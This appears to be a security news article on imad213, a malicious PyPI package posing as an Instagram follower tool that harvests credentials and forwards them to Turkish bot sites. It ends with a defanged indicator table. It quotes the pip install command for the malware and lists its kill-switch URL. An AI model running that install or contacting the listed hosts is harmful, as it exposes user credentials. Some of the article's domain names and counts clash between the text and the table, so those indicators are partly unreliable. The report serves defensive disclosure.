A malicious Python package posing as an Instagram growth tool has been uncovered on the Python Package Index (PyPI), targeting unwitting users with credential theft and a sophisticated exfiltration pipeline.
Security researchers at Socket revealed that the package, named imad213, was authored by a threat actor using the alias im_ad__213 and distributed with professional branding, including a comprehensive README and seemingly legitimate safety tips.
PyPI Malware Masquerades as Social Media Booster
The tool, advertised as a way to boost Instagram followers, initially convinces users of its safety by recommending the use of temporary accounts.
After installation via a simple pip install imad213 command, the malware presents a polished interface labeled “INSTA-FOLLOWERS,” further easing user suspicion.
However, once executed, the script secretly connects to a Netlify-hosted file serving as a “kill switch.”
This remote check allows the attacker to disable the malware at any time, making detection and takedown significantly harder.
After passing the remote authentication step, the tool prompts users for their Instagram credentials under the guise of account verification necessary for providing follower boosts.
It deceptively saves these credentials in plaintext on the victim’s machine, leveraging Arabic-language code comments to mask intent and possibly implicate the threat actor’s origin.
The true attack comes next: the stolen Instagram credentials are surreptitiously sent to ten different Turkish-hosted third-party bot services.
These sites each with slick interfaces and phony disclaimers collect and potentially resell or abuse harvested login details on a broad scale.
Notably, the infrastructure was found to be well-coordinated, with related domains registered through the same Turkish registrar and maintained under privacy protection for nearly four years.
VirusTotal and other security vendors have flagged the primary collection domain, takipcimx[.]net, for active phishing.
Coordinated Credential Harvesting Operation Detected
The attacker’s broader campaign is evidenced by similar packages (taya, a-b27, and poppo213) sharing branding, ASCII art, and code patterns.
This demonstrates a unified toolkit targeting not only Instagram but also Free Fire gamers and users of other social media platforms.
The operation’s use of legitimate hosting providers like Netlify to disguise command-and-control adds to the threat’s persistence, leveraging “trusted” infrastructure to bypass detection.
Distributing credentials to multiple sites suggests a credential laundering strategy, in which the attacker’s infrastructure obscures the true origin of stolen data.
Future adaptations could further exploit legitimate hosting, decentralized networks, and advanced social engineering, such as fake security features, to increase the rate of compromise and reduce traceability.
For users, the risks are severe: handing over Instagram credentials can result not just in account hijack or loss of direct messaging privacy but can also enable cross-platform attacks if similar passwords are used elsewhere.
Instagram’s own guidance warns against the use of unauthorized tools to inflate followers, often resulting in suspension or permanent bans for policy violations.
Researchers recommend heightened caution before installing any third-party “growth” utilities from PyPI or unofficial sources, and urge the use of multi-factor authentication and unique passwords for social media accounts.
Developers are encouraged to leverage advanced security scanning tools in their CI/CD pipelines to detect suspicious package behaviors before integrating them into projects.
Indicators of Compromise (IOC)
| Type | Indicator/Detail | Description/Notes |
|---|---|---|
| Threat Actor | im_ad__213 | PyPI author; email: madmadimado59@gmail[.]com |
| GitHub | https://github[.]com/imadoo27/ | Source repository hosting malicious code |
| C2/Remote Control | https://imad-213-imad21[.]netlify[.]app/pass[.]txt | Netlify kill switch file |
| Domains (Phishing) | takimcimx[.]net, takimcizen[.]com, bigtakip[.]net, takimcigen[.]com, takimciking[.]net, takimcikrali[.]com, takimcitime[.]net, takip88[.]com, instamoda[.]org | All flagged for credential theft/phishing |
| Local Artifact | credentials.txt | Stores stolen credentials in plaintext |
| Social Profile | instagram[.]com/nasreddin_imad | Linked attacker’s Instagram handle |
| MITRE ATT&CK | T1027, T1566.002, T1041, T1195.002 | Obfuscation, Phishing, Exfil over C2, Supply Chain |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Update
